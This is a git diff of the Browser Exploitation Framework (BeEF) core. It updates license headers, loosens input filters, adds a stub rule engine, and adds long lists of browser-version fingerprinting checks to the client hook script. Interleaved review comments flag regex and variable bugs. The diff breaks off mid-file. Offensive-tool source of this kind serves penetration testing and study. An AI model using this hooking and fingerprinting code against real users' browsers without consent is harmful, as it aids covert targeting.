diff --git a/core/bootstrap.rb b/core/bootstrap.rb index 0ae748c22..372ce86d9 100644 --- a/core/bootstrap.rb +++ b/core/bootstrap.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -34,6 +24,8 @@ require 'core/main/handlers/browserdetails' # @note Include the network stack require 'core/main/network_stack/handlers/dynamicreconstruction' +require 'core/main/network_stack/handlers/redirector' +require 'core/main/network_stack/handlers/raw' require 'core/main/network_stack/assethandler' require 'core/main/network_stack/api' @@ -50,8 +42,10 @@ require 'core/hbmanager' ## @note Include RESTful API require 'core/main/rest/handlers/hookedbrowsers' require 'core/main/rest/handlers/modules' +require 'core/main/rest/handlers/categories' require 'core/main/rest/handlers/logs' require 'core/main/rest/handlers/admin' +require 'core/main/rest/handlers/server' require 'core/main/rest/api' ## @note Include Websocket diff --git a/core/core.rb b/core/core.rb index 6dcff13f2..c16318217 100644 --- a/core/core.rb +++ b/core/core.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -47,4 +37,7 @@ require 'core/main/migration' require 'core/main/console/commandline' require 'core/main/console/banners' +# @note Include rubyzip lib +require 'zip' + diff --git a/core/extension.rb b/core/extension.rb index 7b52fe344..c9535d33d 100644 --- a/core/extension.rb +++ b/core/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension 
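Review bot: `require 'zip'` in core.rb brings an archive library into the core load path with no visible guard on where extracted entry names may point; the code that consumes it is not in this hunk, so treat this as a caveat rather than a finding. Wherever `Zip::File` entries are later written to disk, the destination should be checked before extraction, e.g. `dest = File.expand_path(entry.name, base); raise "bad entry" unless dest.start_with?(base + File::SEPARATOR)`, because entry names inside an archive are data from whoever built the archive, not trusted input. A one-line comment next to the require naming which extension depends on it and that entry names must be validated on extraction, such as `# rubyzip: used by the extension that handles uploaded archives; validate entry.name before extracting`, would save the next reader from having to grep for the consumer.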
diff --git a/core/extensions.rb b/core/extensions.rb index f5f2026f2..960599b10 100644 --- a/core/extensions.rb +++ b/core/extensions.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extensions diff --git a/core/filters.rb b/core/filters.rb index 1522bb250..88adc8118 100644 --- a/core/filters.rb +++ b/core/filters.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters 
diff --git a/core/filters/base.rb b/core/filters/base.rb index 14492577b..39b2a5044 100644 --- a/core/filters/base.rb +++ b/core/filters/base.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/browser.rb b/core/filters/browser.rb index 7dbcfdfc6..1ecdd0023 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters 
@@ -32,7 +22,7 @@ module Filters def self.is_valid_browsertype?(str) return false if not is_non_empty_string?(str) return false if str.length < 10 - return false if str.length > 50 + return false if str.length > 250 return false if has_non_printable_char?(str) true end @@ -133,9 +123,9 @@ module Filters return true if not is_non_empty_string?(str) return false if str.length > 1000 if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8') - return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil? + return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil? else - return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil? + return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil? end end diff --git a/core/filters/command.rb b/core/filters/command.rb index dcb779a8b..a80abf96c 100644 --- a/core/filters/command.rb +++ b/core/filters/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/http.rb b/core/filters/http.rb index 74e316d03..6a79287e3 100644 --- a/core/filters/http.rb +++ b/core/filters/http.rb 
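Review bot: In the second hunk the character class `[^\w\d\s()-.,';_!\302\256]` has an unescaped `-` between `)` and `.`, which Ruby parses as the range `)`–`.` (0x29–0x2E) rather than a literal hyphen, so `*` and `+` silently pass this allow-list alongside the intended `,` and `-`; the newly added `'` is syntactically fine but widens what reaches downstream consumers. Escape the hyphen or move it to the end of the class in both branches: `return (str =~ /[^\w\d\s().,';_!\-\302\256]/u).nil?` and the matching `/n` form. Because `'` is now accepted, any place that interpolates these filtered strings into single-quoted JavaScript or HTML attributes in the admin UI must escape them; those consumers are not visible from this hunk, so please confirm. The method that contains this regex starts before the hunk, so its name and the first-hunk change (browser-type length cap raised from 50 to 250, still protected by `has_non_printable_char?`) are the only context available here.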
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/filters/page.rb b/core/filters/page.rb index b75852f18..5d63d423f 100644 --- a/core/filters/page.rb +++ b/core/filters/page.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Filters diff --git a/core/hbmanager.rb b/core/hbmanager.rb index cd5eb8bc0..3ea1747ce 100644 --- a/core/hbmanager.rb +++ b/core/hbmanager.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module HBManager diff --git a/core/loader.rb b/core/loader.rb index 3ba04c62f..502a664e5 100644 --- a/core/loader.rb +++ b/core/loader.rb @@ -1,17 +1,8 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. # @note Include here all the gems we are using require 'rubygems' diff --git a/core/main/client/are.js b/core/main/client/are.js index 4cdcff84b..fce1728cc 100644 --- a/core/main/client/are.js +++ b/core/main/client/are.js 
@@ -1,25 +1,47 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.are = { init:function(){ var Jools = require('jools'); this.ruleEngine = new Jools(); }, - rules:[], + send:function(module){ + // there will probably be some other stuff here before things are finished + this.commands.push(module); + }, + execute:function(inputs){ + this.rulesEngine.execute(input); + }, + cache_modules:function(modules){}, + rules:[ + { + 'name':"exec_no_input", + 'condition':function(command,browser){ + //need to figure out how to handle the inputs + return (!command['inputs'] || command['inputs'].length == 0) + }, + 'consequence':function(command,browser){} + }, + { + 'name':"module_has_sibling", + 'condition':function(command,commands){ + return false; + }, + 'consequence':function(command,commands){} + }, + { + 'name':"module_depends_on_module", + 'condition':function(command,commands){ + return false; + }, + 'consequence':function(command,commands){} + } + ], commands:[], results:[] }; -beef.regCmp("beef.are"); \ No newline at end of file +beef.regCmp("beef.are"); diff --git a/core/main/client/beef.js b/core/main/client/beef.js index b580c936c..f2f64f928 100644 --- a/core/main/client/beef.js +++ b/core/main/client/beef.js 
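Review bot: `execute` references `this.rulesEngine` and `input`, but `init` stores the engine as `this.ruleEngine` and the parameter is named `inputs`, so any call to `beef.are.execute()` throws (`this.rulesEngine` is undefined) before the rule engine is ever reached. The fix is one line: `execute:function(inputs){ this.ruleEngine.execute(inputs); },`. The rule callbacks are also inconsistent — `exec_no_input` takes `(command,browser)` while the other two take `(command,commands)` — and all three consequences are empty, so a header comment such as `// WIP: rules are placeholders and execute() is not yet wired into the hook loop` would stop a reader assuming this component is live. The loose comparison in `command['inputs'].length == 0` would be clearer as `=== 0`.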
@@ -1,27 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * BeEF JS Library <%= @beef_version %> - * http://beef.googlecode.com/ + * Register the BeEF JS on the window object. */ $j = jQuery.noConflict(); -//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>'; - if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { var BeefJS = { @@ -42,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { // An array containing all the BeEF JS components. components: new Array(), - + + /** + * Adds a function to display debug messages (wraps console.log()) + * @param: {string} the debug string to return + */ + debug: function(msg) { + if (!<%= @client_debug %>) return; + if (typeof console == "object" && typeof console.log == "function") { + console.log(msg); + } else { + // TODO: maybe add a callback to BeEF server for debugging purposes + //window.alert(msg); + } + }, + /** * Adds a function to execute. * @param: {Function} the function to execute. diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 42bfcaca0..b66086ac6 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js 
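Review bot: `if (!<%= @client_debug %>) return;` in the new `debug` helper is expanded by ERB on the server, so if `@client_debug` is nil or an empty string the hook is served as `if (!) return;`, a syntax error that breaks the entire hook file rather than just the debug output. Render an explicit boolean instead: `if (!<%= @client_debug ? 'true' : 'false' %>) return;` (if the config value can arrive as the string "false", compare it explicitly on the Ruby side). I cannot see where `@client_debug` is assigned, so whether it can be nil in practice is inferred. The `typeof console == "object"` and `typeof console.log == "function"` checks would read better with `===`, and the commented-out `//window.alert(msg);` is dead code that can go with the TODO.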
@@ -1,769 +1,1677 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /** * @literal object: beef.browser * * Basic browser functions. */ beef.browser = { - - /** - * Returns the user agent that the browser is claiming to be. - * @example: beef.browser.getBrowserReportedName() - */ - getBrowserReportedName: function() { - return navigator.userAgent; - }, - - /** - * Returns true if IE6. - * @example: beef.browser.isIE6() - */ - isIE6: function() { - return !window.XMLHttpRequest && !window.globalStorage; - }, - - /** - * Returns true if IE7. - * @example: beef.browser.isIE7() - */ - isIE7: function() { - return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode; - }, - - /** - * Returns true if IE8. - * @example: beef.browser.isIE8() - */ - isIE8: function() { - return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance; - }, - - /** - * Returns true if IE9. 
- * @example: beef.browser.isIE9() - */ - isIE9: function() { - return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance; - }, - - /** - * Returns true if IE. - * @example: beef.browser.isIE() - */ - isIE: function() { - return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9(); - }, - - /** - * Returns true if FF2. - * @example: beef.browser.isFF2() - */ - isFF2: function() { - return !!window.globalStorage && !window.postMessage; - }, - - /** - * Returns true if FF3. - * @example: beef.browser.isFF3() - */ - isFF3: function() { - return !!window.globalStorage && !!window.postMessage && !JSON.parse; - }, - - /** - * Returns true if FF3.5. - * @example: beef.browser.isFF3_5() - */ - isFF3_5: function() { - return !!window.globalStorage && !!JSON.parse && !window.FileReader; - }, - - /** - * Returns true if FF3.6. - * @example: beef.browser.isFF3_6() - */ - isFF3_6: function() { - return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState; - }, + + /** + * Returns the user agent that the browser is claiming to be. + * @example: beef.browser.getBrowserReportedName() + */ + getBrowserReportedName:function () { + return navigator.userAgent; + }, + + /** + * Returns true if Avant Browser. + * @example: beef.browser.isA() + */ + isA:function () { + return window.navigator.userAgent.match(/Avant TriCore/) != null; + }, + + /** + * Returns true if Iceweasel. + * @example: beef.browser.isI() + */ + isI:function () { + return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null; + }, + + /** + * Returns true if IE6. + * @example: beef.browser.isIE6() + */ + isIE6:function () { + return !window.XMLHttpRequest && !window.globalStorage; + }, + + /** + * Returns true if IE7. 
+ * @example: beef.browser.isIE7() + */ + isIE7:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !window.getComputedStyle && !window.globalStorage && !document.documentMode; + }, + + /** + * Returns true if IE8. + * @example: beef.browser.isIE8() + */ + isIE8:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !window.performance; + }, + + /** + * Returns true if IE9. + * @example: beef.browser.isIE9() + */ + isIE9:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints === "undefined"; + }, + + /** + * + * Returns true if IE10. + * @example: beef.browser.isIE10() + */ + isIE10:function () { + return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance && typeof navigator.msMaxTouchPoints !== "undefined"; + }, + + /** + * Returns true if IE. + * @example: beef.browser.isIE() + */ + isIE:function () { + return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10(); + }, + + /** + * Returns true if FF2. + * @example: beef.browser.isFF2() + */ + isFF2:function () { + return !!window.globalStorage && !window.postMessage; + }, + + /** + * Returns true if FF3. + * @example: beef.browser.isFF3() + */ + isFF3:function () { + return !!window.globalStorage && !!window.postMessage && !JSON.parse; + }, + + /** + * Returns true if FF3.5. + * @example: beef.browser.isFF3_5() + */ + isFF3_5:function () { + return !!window.globalStorage && !!JSON.parse && !window.FileReader; + }, + + /** + * Returns true if FF3.6. 
+ * @example: beef.browser.isFF3_6() + */ + isFF3_6:function () { + return !!window.globalStorage && !!window.FileReader && !window.multitouchData && !window.history.replaceState; + }, + + /** + * Returns true if FF4. + * @example: beef.browser.isFF4() + */ + isFF4:function () { + return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null; + }, + + /** + * Returns true if FF5. + * @example: beef.browser.isFF5() + */ + isFF5:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null; + }, + + /** + * Returns true if FF6. + * @example: beef.browser.isFF6() + */ + isFF6:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null; + }, + + /** + * Returns true if FF7. + * @example: beef.browser.isFF7() + */ + isFF7:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null; + }, + + /** + * Returns true if FF8. + * @example: beef.browser.isFF8() + */ + isFF8:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null; + }, + + /** + * Returns true if FF9. + * @example: beef.browser.isFF9() + */ + isFF9:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null; + }, + + /** + * Returns true if FF10. + * @example: beef.browser.isFF10() + */ + isFF10:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null; + }, + + /** + * Returns true if FF11. 
+ * @example: beef.browser.isFF11() + */ + isFF11:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null; + }, + + /** + * Returns true if FF12 + * @example: beef.browser.isFF12() + */ + isFF12:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; + }, + + /** + * Returns true if FF13 + * @example: beef.browser.isFF13() + */ + isFF13:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; + }, + + /** + * Returns true if FF14 + * @example: beef.browser.isFF14() + */ + isFF14:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null; + }, + + /** + * Returns true if FF15 + * @example: beef.browser.isFF15() + */ + isFF15:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null; + }, + + /** + * Returns true if FF16 + * @example: beef.browser.isFF16() + */ + isFF16:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null; + }, + + /** + * Returns true if FF17 + * @example: beef.browser.isFF17() + */ + isFF17:function () { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/17\./) != null; + }, + + /** + * Returns true if FF18 + * @example: beef.browser.isFF18() + */ + isFF18:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/18\./) != null; + }, + + /** + * Returns true if FF19 + * @example: beef.browser.isFF19() + */ + isFF19:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null; + }, /** - * Returns true if FF4. 
- * @example: beef.browser.isFF4() + * Returns true if FF20 + * @example: beef.browser.isFF20() */ - isFF4: function() { - return !!window.globalStorage && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/4\./) != null; - }, - - /** - * Returns true if FF5. - * @example: beef.browser.isFF5() - */ - isFF5: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/5\./) != null; + isFF20:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null; }, - /** - * Returns true if FF6. - * @example: beef.browser.isFF6() - */ - isFF6: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/6\./) != null; - }, + /** + * Returns true if FF21 + * @example: beef.browser.isFF21() + */ + isFF21:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null; + }, - /** - * Returns true if FF7. - * @example: beef.browser.isFF7() - */ - isFF7: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/7\./) != null; - }, + /** + * Returns true if FF22 + * @example: beef.browser.isFF22() + */ + isFF22:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null; + }, - /** - * Returns true if FF8. 
- * @example: beef.browser.isFF8() - */ - isFF8: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/8\./) != null; - }, + /** + * Returns true if FF23 + * @example: beef.browser.isFF23() + */ + isFF23:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null; + }, - /** - * Returns true if FF9. - * @example: beef.browser.isFF9() - */ - isFF9: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/9\./) != null; - }, + /** + * Returns true if FF24 + * @example: beef.browser.isFF24() + */ + isFF24:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null; + }, - /** - * Returns true if FF10. - * @example: beef.browser.isFF10() - */ - isFF10: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/10\./) != null; - }, + /** + * Returns true if FF25 + * @example: beef.browser.isFF25() + */ + isFF25:function () { + return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null; + }, - /** - * Returns true if FF11. - * @example: beef.browser.isFF11() - */ - isFF11: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/11\./) != null; - }, + /** + * Returns true if FF. 
+ * @example: beef.browser.isFF() + */ + isFF:function () { + return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25(); + }, - /** - * Returns true if FF12 - * @example: beef.browser.isFF12() - */ - isFF12: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; - }, + /** + * Returns true if Safari 4.xx + * @example: beef.browser.isS4() + */ + isS4:function () { + return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window)); + }, - /** - * Returns true if FF13 - * @example: beef.browser.isFF13() - */ - isFF13: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; - }, - - /** - * Returns true if FF14 - * @example: beef.browser.isFF14() - */ - isFF14: function() { - return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null; - }, - - /** - * Returns true if FF. 
